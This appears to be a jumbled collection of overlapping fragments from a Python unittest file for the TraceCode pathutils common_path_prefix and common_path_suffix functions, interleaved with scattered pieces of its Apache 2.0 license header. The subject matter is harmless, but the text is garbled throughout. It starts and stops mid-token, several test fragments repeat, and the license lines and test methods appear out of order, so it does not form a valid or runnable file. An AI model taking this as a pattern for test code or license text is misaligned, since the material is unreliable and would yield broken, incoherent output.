'/a/') assert ('a', 1) == test def test_common_path_prefix20(self):", "test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test", "pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/')", "test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test =", "either express or implied. No content created from # TraceCode should be considered", "either express or implied. See the License for the # specific language governing", "from __future__ import division from __future__ import print_function from __future__ import unicode_literals import", "test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0) == test def", "pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/')", "('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2)", "permissions and limitations under the License. # # When you publish or redistribute", "License. # You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 #", "'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert", "3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) ==", "= pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c',", "test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test", "License for the # specific language governing permissions and limitations under the License.", "pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt')", "assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c',", "assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b',", "= pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c',", "test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def", "test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def", "TraceCode is a trademark of nexB Inc. # # You may not use", "is a free and open source software analysis tool from nexB Inc. and", "test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def", "tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c',", "the Apache License version 2.0. # Data generated with TraceCode require an acknowledgment.", "def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self):", "= pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/',", "== test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND,", "pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/')", "test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test =", "= pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/',", "== test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test", "(None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0)", "== test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test", "test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def", "2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) ==", "def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self):", "absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals", "and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software", "test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def", "pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/')", "('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3)", "publish or redistribute any data created with TraceCode or any TraceCode # derivative", "def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self):", "2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) ==", "test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def", "test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment is ignored", "pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c')", "print_function from __future__ import unicode_literals import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase):", "0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0) ==", "assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c',", "rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under", "test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test =", "License. # # When you publish or redistribute any data created with TraceCode", "pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a')", "# You may not use this software except in compliance with the License.", "generated with TraceCode require an acknowledgment. # TraceCode is a trademark of nexB", "assert ('a/b', 2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a',", "express or implied. See the License for the # specific language governing permissions", "test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test =", "== test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test", "advice. Consult an Attorney # for any legal advice. # TraceCode is a", "def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self):", "def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self):", "1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) ==", "3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) ==", "\"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express", "License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in", "('a', 1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1)", "= pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c',", "You may not use this software except in compliance with the License. #", "pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/')", "required by applicable law or agreed to in writing, software distributed # under", "# The TraceCode software is licensed under the Apache License version 2.0. #", "compliance with the License. # You may obtain a copy of the License", "to in writing, software distributed # under the License is distributed on an", "test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self): test =", "the License for the # specific language governing permissions and limitations under the", "express or implied. No content created from # TraceCode should be considered or", "assert ('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a',", "test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def", "TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def", "test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test =", "# TraceCode should be considered or used as legal advice. Consult an Attorney", "Generated with TraceCode and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES #", "and open source software analysis tool from nexB Inc. and others. # Visit", "== test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test", "created with TraceCode or any TraceCode # derivative work, you must accompany this", "test = pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test =", "License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS", "def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self):", "under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "assert ('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a',", "pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c')", "2.0. # Data generated with TraceCode require an acknowledgment. # TraceCode is a", "'/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert", "('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2)", "or implied. See the License for the # specific language governing permissions and", "test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test def", "this software except in compliance with the License. # You may obtain a", "assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None,", "acknowledgment. # TraceCode is a trademark of nexB Inc. # # You may", "test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test", "def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self):", "or any TraceCode # derivative work, you must accompany this data with the", "'/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert", "def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self):", "may not use this software except in compliance with the License. # You", "pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c')", "2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) ==", "('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3)", "# derivative work, you must accompany this data with the following acknowledgment: #", "Inc. # # You may not use this software except in compliance with", "this data with the following acknowledgment: # # Generated with TraceCode and provided", "def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self):", "assert (None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None,", "test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test", "def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self):", "derivative work, you must accompany this data with the following acknowledgment: # #", "3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) ==", "('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2)", "= pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/',", "pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b')", "Data generated with TraceCode require an acknowledgment. # TraceCode is a trademark of", "with TraceCode or any TraceCode # derivative work, you must accompany this data", "TraceCode is a free and open source software analysis tool from nexB Inc.", "2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) ==", "test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self): test =", "== test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test", "ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self):", "('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1)", "obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable", "pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f')", "OR CONDITIONS OF ANY KIND, either express or implied. No content created from", "== test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test", "with TraceCode and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR", "__future__ import print_function from __future__ import unicode_literals import unittest from tracecode import pathutils", "test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def", "== test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test", "test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def", "def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self):", "('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2)", "test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def", "'/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert", "test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def", "Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode", "= pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c',", "ANY KIND, either express or implied. See the License for the # specific", "= pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b',", "test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self): test", "# Unless required by applicable law or agreed to in writing, software distributed", "test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test =", "a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law", "pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '')", "assert ('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c',", "# specific language governing permissions and limitations under the License. # # When", "considered or used as legal advice. Consult an Attorney # for any legal", "https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import absolute_import from __future__ import", "'/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert", "def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self):", "# Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import absolute_import from", "assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b',", "test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test =", "the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to", "Consult an Attorney # for any legal advice. # TraceCode is a free", "advice. # TraceCode is a free and open source software analysis tool from", "== test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test", "for any legal advice. # TraceCode is a free and open source software", "pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c')", "nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from", "test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test", "'/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert", "TraceCode # derivative work, you must accompany this data with the following acknowledgment:", "# http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the Apache", "test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test =", "is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF", "You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required", "OF ANY KIND, either express or implied. See the License for the #", "'/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert", "= pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c',", "assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c',", "pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt')", "2) == test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) ==", "test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test", "def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self):", "software analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support", "KIND, either express or implied. See the License for the # specific language", "'/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert", "'/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert", "content created from # TraceCode should be considered or used as legal advice.", "pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c')", "test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self): test =", "('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1)", "any data created with TraceCode or any TraceCode # derivative work, you must", "See the License for the # specific language governing permissions and limitations under", "= pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments", "test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test", "assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a',", "assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b',", "= pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt',", "assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None,", "assert ('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c',", "unicode_literals import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test =", "= pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/',", "pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/')", "import print_function from __future__ import unicode_literals import unittest from tracecode import pathutils class", "'/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert", "('a', 1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1)", "__future__ import division from __future__ import print_function from __future__ import unicode_literals import unittest", "test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test def test_common_path_prefix14(self): test", "test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test", "def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self):", "test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self): test", "= pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c',", "assert (None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None,", "import division from __future__ import print_function from __future__ import unicode_literals import unittest from", "pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt')", "# Data generated with TraceCode require an acknowledgment. # TraceCode is a trademark", "OF ANY KIND, either express or implied. No content created from # TraceCode", "(None, 0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0)", "'/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert", "== test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test", "test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test", "test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test", "def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def test_common_path_prefix19(self):", "(c) nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ #", "2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) ==", "('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1)", "and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the Apache License version", "software is licensed under the Apache License version 2.0. # Data generated with", "may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by", "is licensed under the Apache License version 2.0. # Data generated with TraceCode", "= pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/',", "1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) ==", "assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '') assert (None,", "0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) ==", "# Copyright (c) nexB Inc. and others. All rights reserved. # http://nexb.com and", "test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test", "'/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert", "0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '') assert (None, 0) ==", "pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/')", "test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test =", "1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) ==", "pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '')", "'/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert", "test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def", "must accompany this data with the following acknowledgment: # # Generated with TraceCode", "test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY", "specific language governing permissions and limitations under the License. # # When you", "with the License. # You may obtain a copy of the License at:", "assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b',", "# TraceCode is a trademark of nexB Inc. # # You may not", "= pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d',", "== test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test", "assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c',", "from nexB 